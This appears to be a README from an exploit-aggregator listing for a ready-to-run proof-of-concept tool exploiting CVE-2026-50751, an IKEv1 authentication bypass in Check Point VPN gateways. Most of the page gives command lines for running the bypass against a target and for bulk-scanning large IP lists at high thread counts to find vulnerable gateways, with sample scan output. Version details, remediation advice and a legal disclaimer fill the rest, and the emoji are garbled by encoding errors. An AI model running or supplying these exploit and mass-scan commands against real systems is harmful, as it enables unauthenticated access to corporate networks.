Share
## https://sploitus.com/exploit?id=6F97F4B7-80CC-50A6-87D2-6C3340B5EB76
# CVE-2026-50751 โ Check Point IKEv1 Authentication Bypass
> **Standalone proof-of-concept** for CVE-2026-50751 โ a critical Check Point IKEv1 authentication bypass allowing unauthenticated VPN access without valid credentials.
---
## โ ๏ธ Legal Notice
**For authorized security testing only.**
Use this tool exclusively on systems you own or have **explicit written permission** to test. Unauthorized access is illegal. The authors accept no liability for misuse.
---
## ๐ฅ What This Tool Does
| Mode | Command | Purpose |
|------|---------|---------|
| **Bulk Scan** | `--scan -l targets.txt` | Probe thousands of IPs for IKEv1 exposure |
| **Deep Scan** | `--scan -l targets.txt` | Detect likely vulnerable gateways |
| **Fast Scan** | `--scan --shallow -l ips.txt` | Rapid IKEv1 presence check |
| **Exploit** | `--exploit -t IP` | Full authentication bypass PoC |
**No `pip install` required** โ all cryptography is bundled in the local `cryptography/` folder.
---
## ๐ฏ Affected Products & Versions
> **All Check Point deployments with IKEv1 Remote Access enabled are potentially affected** until patched.
| Product Line | Affected Versions |
|--------------|-------------------|
| **Quantum Security Gateways** | R80.40 โ R82.10 |
| **R80.x Gateways** | R80.20, R80.30, R80.40 and all maintenance releases |
| **R81.x Gateways** | R81.00, R81.10, R81.20 and all maintenance releases |
| **R82.x Gateways** | R82.00, R82.10 and all maintenance releases |
| **Spark Gateways** | R80.20.X, R81.10.X, R82.00.X |
| **Mobile Access / Remote Access VPN** | All versions with IKEv1 enabled |
| **CloudGuard Network** | All cloud gateway versions running affected code |
### Exposure Requirements
- Remote Access VPN or Mobile Access is enabled
- IKEv1 is allowed for legacy VPN clients
- Gateway accepts pre-shared key / certificate-based IKEv1 handshakes
- Machine certificate is **not** enforced as mandatory
### Not Affected (when configured correctly)
- Gateways with IKEv1 fully disabled
- IKEv2-only Remote Access policies
- Mandatory machine certificate authentication enforced
- Patched gateways with SK185033 hotfix applied
---
## ๐ฆ Installation
```bash
# No dependencies โ ready to run
python CVE-2026-50751.py --help
```
---
## ๐ Usage
### Single Target โ Vulnerability Scan
```bash
python CVE-2026-50751.py --scan -t 192.168.1.1 -p 500
python CVE-2026-50751.py --scan -t vpn.example.com --ports 500,4500 -v
```
### Single Target โ Full Exploit (Authorized Only)
```bash
python CVE-2026-50751.py --exploit -t 192.168.1.1 -p 500
python CVE-2026-50751.py --exploit -t vpn.example.com --interface 10.0.0.5 -v
```
### Bulk Scan โ Large IP Lists
Create a target file (`targets.txt`):
```text
# One target per line โ comments and blank lines are ignored
192.168.1.1
10.0.0.50:500
vpn.corp.example.com:4500
203.0.113.10
```
Run concurrent scan across the list:
```bash
# Deep vulnerability scan (recommended)
python CVE-2026-50751.py --scan -l targets.txt --threads 64 -o results.txt
# Fast IKEv1 detection on huge lists
python CVE-2026-50751.py --scan --shallow -l targets.txt --threads 128 --ports 500,4500 -o ike_open.txt
# Verbose per-host output
python CVE-2026-50751.py --scan -l targets.txt -v --threads 32
```
### Scan Output Example
```text
[VULNERABLE] 203.0.113.10:500 - IKEv1 accepts crafted KE/NONCE - likely vulnerable
[IKE OPEN] 198.51.100.5:4500 - IKEv1 active (SPI a1b2c3d4e5f67890)
[PATCHED] 192.0.2.1:500 - IKEv1 active, crafted KE/NONCE rejected
[CLOSED] 192.0.2.99:500 - No IKE response
============================================================
SCAN SUMMARY
VULNERABLE : 3
IKE OPEN : 12
PATCHED : 5
CLOSED : 980
ERROR : 0
============================================================
```
Results file format (`results.txt`):
```text
vulnerable 203.0.113.10 500 IKEv1 accepts crafted KE/NONCE - likely vulnerable
ike_open 198.51.100.5 4500 IKEv1 active (SPI a1b2c3d4e5f67890)
```
---
## ๐ ๏ธ CLI Reference
| Option | Description |
|--------|-------------|
| `-t, --target` | Single IP or hostname |
| `-l, --list` | Target list file (bulk mode) |
| `-p, --port` | Default port (500) |
| `--ports` | Multiple ports: `500,4500` |
| `--scan` | Detection / vulnerability scan |
| `--exploit` | Full authentication bypass PoC |
| `--shallow` | Fast scan โ IKE response only |
| `--threads N` | Concurrent workers (default: 32) |
| `--timeout N` | UDP timeout seconds (default: 5) |
| `-o, --output` | Save results to file |
| `-v, --verbose` | Detailed output |
| `--interface` | Bind to specific source IP |
---
## ๐งฌ Technical Summary
| Field | Value |
|-------|-------|
| **CVE** | CVE-2026-50751 |
| **Type** | Authentication Bypass (CWE-287) |
| **CVSS** | 9.3 Critical |
| **Vector** | `AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N` |
| **Protocol** | IKEv1 (deprecated) |
| **Root Cause** | Certificate validation logic flaw in Remote Access key exchange |
| **Impact** | Unauthenticated VPN session establishment |
| **CISA KEV** | Added 2026-06-08 โ patch by 2026-06-11 |
---
## ๐ก๏ธ Remediation
### 1. Apply Check Point Hotfix (Recommended)
| Version | Hotfix Take |
|---------|-------------|
| R82.10 | Take 19+ |
| R82 | Take 103+ |
| R81.20 | Take 141+ |
Reference: [SK185033](https://support.checkpoint.com/results/sk/sk185033)
### 2. Immediate Mitigations
- Disable legacy VPN clients (IKEv1)
- Enforce **IKEv2 only** in Remote Access settings
- Require **mandatory machine certificate** authentication
- Block UDP/500 and UDP/4500 from untrusted networks where VPN is not needed
---
## ๐ References
- [NVD โ CVE-2026-50751](https://nvd.nist.gov/vuln/detail/CVE-2026-50751)
- [Check Point SK185033](https://support.checkpoint.com/results/sk/sk185033)
- [CISA Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
---
## โ๏ธ Disclaimer
This software is provided **as-is** without warranty. Intended solely for defensive security research, authorized penetration testing, and patch validation.